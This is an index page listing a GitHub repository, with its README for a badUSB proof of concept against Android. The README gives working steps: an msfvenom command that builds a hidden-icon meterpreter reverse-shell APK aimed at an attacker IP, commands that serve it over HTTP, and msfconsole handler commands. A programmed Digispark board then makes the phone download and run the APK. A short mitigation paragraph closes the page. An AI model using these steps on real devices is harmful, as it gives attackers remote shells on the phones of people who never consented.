Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/caioau/badUSB-Targeting-Android
a proof of concept badUSB attack which install a apk on Android
https://github.com/caioau/badUSB-Targeting-Android
Last synced: about 1 month ago
JSON representation
a proof of concept badUSB attack which install a apk on Android
- Host: GitHub
- URL: https://github.com/caioau/badUSB-Targeting-Android
- Owner: caioau
- License: gpl-2.0
- Created: 2019-11-17T22:51:31.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2019-11-17T23:43:33.000Z (about 5 years ago)
- Last Synced: 2024-08-02T13:19:19.168Z (4 months ago)
- Language: C++
- Size: 8.32 MB
- Stars: 113
- Watchers: 9
- Forks: 22
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-starz - caioau/badUSB-Targeting-Android - a proof of concept badUSB attack which install a apk on Android (C++)
README
# badUSB targeting Android (aka rubber duck)
This is a proof of concept of a badUSB attack targeting android, a Arduino is plugged into the phone's USB port (via OTG cable), then the Arduino is programmed to act as a keyboard, then it opens the Browser , Download, installs and runs a apk (a metasploit reverse shell).
While you had to plug the Arduino into the phone, again this is a proof of concept, the attack can be embed into a charger or cable.
Watch the [screenRecord](screenRecord.mp4) or the [video](video.mp4) to see the attack in action!
## Instructions:
To run this attack you have to:
1. Generate and serve the apk.
2. Keep the metasploit shell ready.
3. Program the Arduino
4. Plug the Arduino into the phone.### Generating the apk
(You have to have metasploit installed) run:
> msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.201 LPORT=4444 AndroidHideAppIcon=true R > /path/to/filename.apk
set **LHOST** and **LPORT** accordingly
then serve the apk:
```
cd path/to/apk
python3 -m http.server 8080
```### Keeping the metasploit shell ready
run the following:
```
msfconsole
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.201
set LPORT 4444
use exploit/multi/handler
run
```set **LHOST** and **LPORT** accordingly
### Program the Arduino
In this step I used a DIY Brazilian attiny85 board called [franzininho](https://franzininho.com.br/), It's the same as using a Digispark
After you have prepared the Arduino IDE for the Digispark board, change the IP address and apkfilename in the [Arduino code](androidBadUsbvf.ino) then upload it to the board.
Finally plug the Arduino into the Phone via the OTG cable.
## Tested on:
The attack was successful on the following phones:
* Moto G8 Plus (Doha): build fingerprint: motorola/doha/doha:9/PPI29.65-24/773d3:user/release-keys ; Security patch level: September 1, 2019; Chrome version 78.0.3904.96
## Mitigations:
In order to mitigate this attack you could just leave the phone always locked when charging.
But I believe the Android should prevent this type of attack, Android could don't authorize USB devices and display a warning asking if the user really plugged a keyboard and if authorize it, similar to [usbguard](https://usbguard.github.io/);